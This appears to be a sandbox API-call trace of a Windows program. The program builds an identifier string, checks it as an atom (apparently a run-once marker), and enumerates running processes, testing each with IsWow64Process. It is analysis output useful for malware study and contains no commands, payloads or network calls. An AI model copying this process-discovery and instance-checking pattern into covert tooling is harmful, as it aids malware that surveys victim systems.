	[0074.899] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.899] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.900] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.900] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.901] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.902] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.903] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.904] GetLastError () returned 0x5
	[0074.905] GetLastError () returned 0x5
	[0074.905] GetLastError () returned 0x5
	[0074.905] GetLastError () returned 0x5
	[0074.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.905] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.905] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.905] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.906] CloseHandle (hObject=0x224) returned 1
	[0074.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.906] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.907] CloseHandle (hObject=0x224) returned 1
	[0074.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e838, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.907] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.907] CloseHandle (hObject=0x224) returned 1
	[0074.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0074.941] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.948] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.949] CloseHandle (hObject=0x224) returned 1
	[0074.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.949] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.949] CloseHandle (hObject=0x224) returned 1
	[0074.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.950] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.950] CloseHandle (hObject=0x224) returned 1
	[0074.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.950] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.951] CloseHandle (hObject=0x224) returned 1
	[0074.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.951] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.951] CloseHandle (hObject=0x224) returned 1
	[0074.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.951] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.951] CloseHandle (hObject=0x224) returned 1
	[0074.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.956] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.956] CloseHandle (hObject=0x224) returned 1
	[0074.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.956] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.956] CloseHandle (hObject=0x224) returned 1
	[0074.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.957] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.957] CloseHandle (hObject=0x224) returned 1
	[0074.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.957] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.957] CloseHandle (hObject=0x224) returned 1
	[0074.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.958] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.958] CloseHandle (hObject=0x224) returned 1
	[0074.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.959] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.959] CloseHandle (hObject=0x224) returned 1
	[0074.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.959] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.959] CloseHandle (hObject=0x224) returned 1
	[0074.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.959] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.960] CloseHandle (hObject=0x224) returned 1
	[0074.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.960] CloseHandle (hObject=0x224) returned 1
	[0074.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb30, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.960] CloseHandle (hObject=0x224) returned 1
	[0074.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.961] CloseHandle (hObject=0x224) returned 1
	[0074.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.961] CloseHandle (hObject=0x224) returned 1
	[0074.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.962] CloseHandle (hObject=0x224) returned 1
	[0074.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728818, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
